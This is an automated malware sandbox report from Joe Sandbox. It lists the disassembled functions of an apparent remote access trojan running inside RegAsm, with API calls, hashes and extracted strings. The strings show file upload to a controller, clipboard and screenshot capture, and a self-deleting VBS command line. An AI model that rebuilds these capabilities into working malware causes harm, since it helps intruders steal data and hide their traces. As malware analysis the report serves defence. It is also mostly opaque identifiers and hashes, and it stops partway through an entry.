                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$EnvironmentVariable$_wcschr
                                                                • String ID:
                                                                • API String ID: 3899193279-0
                                                                • Opcode ID: 8496763b0818b5098030034dcc69127a0bf1f152158b2efe3c03734e132739af
                                                                • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                                • Opcode Fuzzy Hash: 8496763b0818b5098030034dcc69127a0bf1f152158b2efe3c03734e132739af
                                                                • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                                Function 00412AEF Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,6CCF8300,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                                • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                                • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                                • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                                • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                • String ID: /stext "$0TG$0TG$NG$NG
                                                                • API String ID: 1223786279-2576077980
                                                                • Opcode ID: cd98076cbd31d0c1f17db76443358eb0b8c5969c5226cb19c20294b0481241c1
                                                                • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                                • Opcode Fuzzy Hash: cd98076cbd31d0c1f17db76443358eb0b8c5969c5226cb19c20294b0481241c1
                                                                • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                                                Function 00414DC1 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                • API String ID: 2490988753-744132762
                                                                • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                                • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                                                Function 0041C720 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C786
                                                                • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEnumOpen
                                                                • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                • API String ID: 1332880857-3714951968
                                                                • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                                • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                                Function 0041D620 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                • GetCursorPos.USER32(?), ref: 0041D67A
                                                                • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                                • ExitProcess.KERNEL32 ref: 0041D6F6
                                                                • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                • String ID: Close
                                                                • API String ID: 1657328048-3535843008
                                                                • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                                • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                                Function 00445DD7 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$Info
                                                                • String ID:
                                                                • API String ID: 2509303402-0
                                                                • Opcode ID: d4b587b978178a04d77a312406460529d21981b93c8e51504b7a0db7e668213d
                                                                • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                                • Opcode Fuzzy Hash: d4b587b978178a04d77a312406460529d21981b93c8e51504b7a0db7e668213d
                                                                • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                                Function 00408BB5 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                • __aulldiv.LIBCMT ref: 00408D88
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                                                • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                • API String ID: 3086580692-2582957567
                                                                • Opcode ID: 4f195d3c0c62a6e45262181e9b7fb43f1a1b55c9fe98746a0176ab88057bb64b
                                                                • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                                • Opcode Fuzzy Hash: 4f195d3c0c62a6e45262181e9b7fb43f1a1b55c9fe98746a0176ab88057bb64b
                                                                • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                                Function 00451346 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                • _free.LIBCMT ref: 0045137F
                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 004513A1
                                                                • _free.LIBCMT ref: 004513B6
                                                                • _free.LIBCMT ref: 004513C1
                                                                • _free.LIBCMT ref: 004513E3
                                                                • _free.LIBCMT ref: 004513F6
                                                                • _free.LIBCMT ref: 00451404
                                                                • _free.LIBCMT ref: 0045140F
                                                                • _free.LIBCMT ref: 00451447
                                                                • _free.LIBCMT ref: 0045144E
                                                                • _free.LIBCMT ref: 0045146B
                                                                • _free.LIBCMT ref: 00451483
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                • String ID:
                                                                • API String ID: 161543041-0
                                                                • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                                • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                                Function 0041A045 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 0041A04A
                                                                • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                                • API String ID: 489098229-1431523004
                                                                • Opcode ID: 9ca3d8a5fd9104a035863b57295875439c18cda5a03c1d5b6dbcacfb627d70fe
                                                                • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                                • Opcode Fuzzy Hash: 9ca3d8a5fd9104a035863b57295875439c18cda5a03c1d5b6dbcacfb627d70fe
                                                                • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                                Function 0040D83A Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                  • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
                                                                  • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                                  • Part of subcall function 00413733: RegCloseKey.ADVAPI32(00000000), ref: 00413773
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                                • ExitProcess.KERNEL32 ref: 0040D9FF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                • API String ID: 1913171305-3159800282
                                                                • Opcode ID: 1e1e1886db8e6c311fe31b0eee7891b99183b9c1f502874e8de9c47f57eaf1ee
                                                                • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                                • Opcode Fuzzy Hash: 1e1e1886db8e6c311fe31b0eee7891b99183b9c1f502874e8de9c47f57eaf1ee
                                                                • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                                Function 00450680 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: eb0df5fda3918316229511e27b327a59e2685e6d7c39cee33e37fcee88581610
                                                                • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                                • Opcode Fuzzy Hash: eb0df5fda3918316229511e27b327a59e2685e6d7c39cee33e37fcee88581610
                                                                • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                                Function 00455C5B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                                                • GetLastError.KERNEL32 ref: 00455D6F
                                                                • __dosmaperr.LIBCMT ref: 00455D76
                                                                • GetFileType.KERNEL32(00000000), ref: 00455D82
                                                                • GetLastError.KERNEL32 ref: 00455D8C
                                                                • __dosmaperr.LIBCMT ref: 00455D95
                                                                • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                                • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                                • GetLastError.KERNEL32 ref: 00455F31
                                                                • __dosmaperr.LIBCMT ref: 00455F38
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                • String ID: H
                                                                • API String ID: 4237864984-2852464175
                                                                • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                                • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                                Function 00450AA5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID: \&G$\&G$`&G
                                                                • API String ID: 269201875-253610517
                                                                • Opcode ID: 9de36cd18190ac53dd4309588278547a590e842bc9413f00945d3085e368cb25
                                                                • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                                • Opcode Fuzzy Hash: 9de36cd18190ac53dd4309588278547a590e842bc9413f00945d3085e368cb25
                                                                • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                                Function 00414BEB Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 65535$udp
                                                                • API String ID: 0-1267037602
                                                                • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                                • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                                Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                                • TranslateMessage.USER32(?), ref: 0040557E
                                                                • DispatchMessageA.USER32(?), ref: 00405589
                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                                • API String ID: 2956720200-749203953
                                                                • Opcode ID: 9213bbb22c169094994a56f7f9d9aeb5b1f42a168ee8f97de9231567bb2b22dc
                                                                • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                                • Opcode Fuzzy Hash: 9213bbb22c169094994a56f7f9d9aeb5b1f42a168ee8f97de9231567bb2b22dc
                                                                • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                                Function 00417D1A Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                                • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                                • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                • String ID: 0VG$0VG$<$@$Temp
                                                                • API String ID: 1704390241-2575729100
                                                                • Opcode ID: fdfef061a0c845b66634ed9213ec91d51d63ab98c4c1b6a43026fae5df42adc0
                                                                • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                                • Opcode Fuzzy Hash: fdfef061a0c845b66634ed9213ec91d51d63ab98c4c1b6a43026fae5df42adc0
                                                                • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                                Function 0041697B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenClipboard.USER32 ref: 0041697C
                                                                • EmptyClipboard.USER32 ref: 0041698A
                                                                • CloseClipboard.USER32 ref: 00416990
                                                                • OpenClipboard.USER32 ref: 00416997
                                                                • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                                • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                • CloseClipboard.USER32 ref: 004169BF
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                • String ID: !D@
                                                                • API String ID: 2172192267-604454484
                                                                • Opcode ID: 504df0997904e7872ebe6ecfb3ee4e253f038a0ef8a597049df6207b31d9887a
                                                                • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                                • Opcode Fuzzy Hash: 504df0997904e7872ebe6ecfb3ee4e253f038a0ef8a597049df6207b31d9887a
                                                                • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                                Function 0041330D Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                                • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                • String ID:
                                                                • API String ID: 297527592-0
                                                                • Opcode ID: 33a11f1d8b65504666c7f3d6a65dc1c7f241de2952f14d7c983c905d35a598f5
                                                                • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                                • Opcode Fuzzy Hash: 33a11f1d8b65504666c7f3d6a65dc1c7f241de2952f14d7c983c905d35a598f5
                                                                • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                                Function 0041AB9E Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
